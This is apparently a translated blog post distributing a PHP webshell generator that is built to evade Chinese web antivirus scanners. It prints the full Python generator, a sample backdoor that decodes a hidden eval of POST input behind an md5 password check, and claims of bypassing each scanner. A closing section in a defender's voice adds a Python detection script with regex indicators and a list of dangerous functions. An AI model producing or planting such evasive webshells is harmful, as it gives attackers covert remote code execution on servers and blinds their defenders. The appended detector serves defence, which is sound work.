PHP AV-evasion webshell generator

The generated webshell can get past scanners including, but not limited to, D盾 (D-Shield), WEBDIR+, 河马 (Hema) and 安全狗 (SafeDog).

How it works

The keywords inside the eval() call are split apart with comments, and a class with a constructor is used in place of a direct function reference.

Project URL

GitHub: https://github.com/pureqh/webshell

Download links:

① GitHub: github.com/pureqh/webshell/archive/master.zip
② 雨苁 netdisk: w.ddosi.workers.dev
③ 迅雷 (Xunlei) netdisk: pan.xunlei.com/s/VMGbtMx5ra-c9gH3m2zFOMiNA1
Extraction code: ZTms


If you would rather not download it, you can copy the code below directly.

php_webshell.py code

import random

#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero

shell = '''<?php 
class {0}{1}
        public ${2} = null;
        public ${3} = null;
        function __construct(){1}
            if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
        $this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
        $this->{3} = @{9}($this->{2});
        @eval({5}.$this->{3}.{5});
        {4}{4}{4}
new {0}();
function {6}(${7}){1}
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
    ${8} = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
    $v <<= 8;
        $v += ord(${7}[$i]);
        $vbits += 8;
        while ($vbits >= 5) {1}
            $vbits -= 5;
            ${8} .= $BASE32_ALPHABET[$v >> $vbits];
            $v &= ((1 << $vbits) - 1);{4}{4}
    if ($vbits > 0){1}
        $v <<= (5 - $vbits);
        ${8} .= $BASE32_ALPHABET[$v];{4}
    return ${8};{4}
function {9}(${7}){1}
    ${8} = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
        $v <<= 5;
        if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
            $v += (ord(${7}[$i]) - 97);
        {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
            $v += (24 + ${7}[$i]);
        {4} else {1}
            exit(1);
        {4}
        $vbits += 5;
        while ($vbits >= 8){1}
            $vbits -= 8;
            ${8} .= chr($v >> $vbits);
            $v &= ((1 << $vbits) - 1);{4}{4}
    return ${8};{4}
?>'''


def random_keys(len):
    str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str,len))

def random_name(len):
    str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str,len))

def build_webshell():
    className = random_name(4)
    lef = '''{'''
    parameter1 = random_name(4)
    parameter2 = random_name(4)
    rig = '''}'''
    disrupt = "\"/*"+random_keys(7)+"*/\""
    fun1 = random_name(4)
    fun1_vul = random_name(4)
    fun1_ret = random_name(4)
    fun2 = random_name(4)
    shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
    return shellc


if __name__ == '__main__':
    print (build_webshell())

Usage

python php_webshell.py

For example:

C:\Users\A\Desktop>python php_webshell.py

<?php
class AWNF{
        public $SKBF = null;
        public $QPLS = null;
        function __construct(){
            if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
        $this->SKBF = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
        $this->QPLS = @HTKI($this->SKBF);
        @eval("/*a_]zfoY*/".$this->QPLS."/*a_]zfoY*/");
        }}}
new AWNF();
function NXVK($XQDS){
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
    $FNTL = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($XQDS); $i < $j; $i++){
    $v <<= 8;
        $v += ord($XQDS[$i]);
        $vbits += 8;
        while ($vbits >= 5) {
            $vbits -= 5;
            $FNTL .= $BASE32_ALPHABET[$v >> $vbits];
            $v &= ((1 << $vbits) - 1);}}
    if ($vbits > 0){
        $v <<= (5 - $vbits);
        $FNTL .= $BASE32_ALPHABET[$v];}
    return $FNTL;}
function HTKI($XQDS){
    $FNTL = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($XQDS); $i < $j; $i++){
        $v <<= 5;
        if ($XQDS[$i] >= 'a' && $XQDS[$i] <= 'z'){
            $v += (ord($XQDS[$i]) - 97);
        } elseif ($XQDS[$i] >= '2' && $XQDS[$i] <= '7') {
            $v += (24 + $XQDS[$i]);
        } else {
            exit(1);
        }
        $vbits += 5;
        while ($vbits >= 8){
            $vbits -= 8;
            $FNTL .= chr($v >> $vbits);
            $v &= ((1 << $vbits) - 1);}}
    return $FNTL;}
?>

The first line above (shown in cyan in the original post) is the command that was run; the PHP that follows (shown in red) is the generated AV-evading PHP trojan.

Evasion tests

① D盾 (D-Shield): bypassed

② 河马 (Hema): bypassed

③ Baidu WEBDIR+: bypassed

④ Other WAFs: test them yourself.
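From the defender's side, here is an added Python triage script (my own example, not part of pureqh's tool or this post) that looks for the traits the generator leaves behind: an eval() glued to comment-only string literals, an md5-gated request parameter, the hand-rolled lowercase base32 alphabet, and an error-suppressed call on an object property. It then decodes any quoted base32 constant to show what the eval would actually run. The trait names, the DANGEROUS keyword list and the constructed sample input are assumptions of this example.

```python
import base64
import re
from typing import Optional

# Constructed sample shaped like the generator's output above (encoder/decoder bodies omitted).
SAMPLE = r'''<?php
class AWNF{
        function __construct(){
            if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
        $this->SKBF = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
        $this->QPLS = @HTKI($this->SKBF);
        @eval("/*a_]zfoY*/".$this->QPLS."/*a_]zfoY*/");
        }}}
function NXVK($XQDS){
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
}
?>'''

# Static traits of the emitted shells; the trait names are labels chosen for this example.
INDICATORS = {
    # eval() whose operand is glued to a string literal holding only a block comment
    "eval_split_by_comment": re.compile(r'@?eval\(\s*"/\*[^"]*\*/"\s*\.'),
    # request parameter hashed and compared against a fixed md5: a password gate
    "md5_gated_request": re.compile(r'md5\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\['),
    # hand-rolled base32 (PHP has no builtin) with the lowercase alphabet
    "custom_base32_decoder": re.compile(r"'abcdefghijklmnopqrstuvwxyz234567'"),
    # error-suppressed call of a user function on an object property
    "suppressed_dynamic_call": re.compile(r'@[A-Za-z_]\w*\(\s*\$this->\w+\s*\)'),
}
B32_CONST = re.compile(r"'([a-z2-7]{20,})'")  # quoted, unpadded lowercase base32
DANGEROUS = re.compile(r'\b(?:eval|assert|system|passthru|shell_exec)\s*\(|\$_(?:POST|GET|REQUEST)\[')

def decode_b32(token: str) -> Optional[str]:
    """Decode an unpadded lowercase base32 constant; None if it is not valid base32."""
    padded = token + "=" * (-len(token) % 8)
    try:
        return base64.b32decode(padded, casefold=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def scan_php(src: str) -> dict:
    """Report matched traits and any decoded constant carrying a second-stage eval."""
    traits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    decoded = {}
    for token in B32_CONST.findall(src):
        text = decode_b32(token)
        if text and DANGEROUS.search(text):
            decoded[token] = text
    return {"traits": traits, "decoded_payloads": decoded,
            "suspicious": len(traits) >= 2 or bool(decoded)}
```

Running scan_php over the sample reports all four traits and decodes the base32 constant to the second-stage eval that reads the POST parameter named in the generator's usage comment.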
